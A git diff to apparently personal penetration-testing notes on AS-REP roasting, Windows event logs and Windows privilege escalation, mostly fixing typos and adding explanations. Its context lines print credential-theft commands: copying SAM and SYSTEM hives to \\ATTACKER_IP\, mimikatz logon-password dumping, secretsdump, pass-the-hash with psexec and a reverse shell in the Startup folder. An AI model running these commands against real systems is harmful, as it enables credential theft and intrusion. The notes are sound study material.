diff --git a/Enumeration/AS-REP Roasting.md b/Enumeration/AS-REP Roasting.md index eb5b8e2..5372191 100644 --- a/Enumeration/AS-REP Roasting.md +++ b/Enumeration/AS-REP Roasting.md @@ -1,4 +1,10 @@ -# AS-Rep Roating +# AS-Rep Roasting + +AS-REP Roasting targets account for which preauthentication is disabled. +This means `DONT_REQUIRE_PREAUTH` for an account is enabled, and the DC skips +the verification step. After event type `4768` the `Pre_Authentication_Type=0` +and event code `4769` and `4624` is never triggered. +A service can be requested without any password check. AS-Rep Roasting dumps user accounts which did not enable pre-authentication. This is somewhat similar to Kerberoasting but includes user accounts as well. diff --git a/Forensics/Windows Event Logs.md b/Forensics/Windows Event Logs.md index 952c0e0..51db21d 100644 --- a/Forensics/Windows Event Logs.md +++ b/Forensics/Windows Event Logs.md @@ -27,6 +27,7 @@ Get-WinEvent -FilterHashTable @{LogName='';ID=''} | fl * **1**: Process Creation (Applications & Services -> Microsoft -> Windows -> Sysmon -> Operational) +* **10**: ProcessAccess, Sysmon event where one process opens a handle to another process * **4688**: Process Creation (Windows Logs -> Security) ### Files diff --git a/Post Exploitation/Windows/Windows PrivEsc.md b/Post Exploitation/Windows/Windows PrivEsc.md index 6d6d2cb..32fcdee 100644 --- a/Post Exploitation/Windows/Windows PrivEsc.md +++ b/Post Exploitation/Windows/Windows PrivEsc.md @@ -145,7 +145,7 @@ sc start TheService ### Startup Application -* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` +* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` ### Password Mining @@ -184,7 +184,7 @@ C:\inetpub\wwwroot\web.config C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config ``` -### Putty +### Putty * Saved proxy password credentials may be found via ```sh @@ -294,7 +294,7 @@ secretsdump.py -sam sam.hive -system system.hive LOCAL hashdump ``` -* Use pass the hash to login +* Use pass the hash to login ```sh psexec.py -hashes administrator@$TARGET_IP ``` @@ -314,7 +314,7 @@ copy cmd.exe utilman.exe * It is a rouge potato * Execute process as another user * Service accounts operate through impersonation -* Check privileges via `whoami /priv` for these +* Check privileges via `whoami /priv` for these * __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker ```sh socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234 @@ -324,12 +324,14 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234 ### Volume Shadow Copy Service -* Take a look at the volumes at +Take a look at the volumes at + ```sh vssadmin list shadows ``` -* Copy `sam` and `system` from the shadow copy +Copy `sam` and `system` from the shadow copy + ```sh copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\ @@ -337,10 +339,14 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sys ### Dump LSASS -* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile` +LSASS contains multiple different credential types like NTLM password hashes, +active krb session tickets, plaintext passwords and cached domain credentials. + +* If administrator permissions are gained, a dump file can be created by opening the task manager and right-clicking `lsass.exe` -> `creat dumpfile` * Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe` * Extract the dump via mimikatz + ```sh privilege::debug sekurlsa::logonpasswords @@ -387,7 +393,7 @@ sekurlsa::credman ### Ntdsutil * If administrative permissions on the DC have been gained this can be done -* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM) +* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM) #### Locally extracting ntds.dit @@ -411,7 +417,7 @@ secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local #### Remotely dumping ntds -* Needs the following AD credentials +* Needs the following AD credentials * Replicating Directory Changes * Replicating Directory Changes All * Replicating Directory Changes in Filtered Set @@ -469,7 +475,7 @@ net user GetUserSPNs.py -dc-ip $DC_IP / ``` -* Take a look at `Name` in the output and use it to query a TGS ticket +* Take a look at `Name` in the output and use it to query a TGS ticket ```sh GetUserSPNs.py -dc-ip $DC_IP / -request-user ```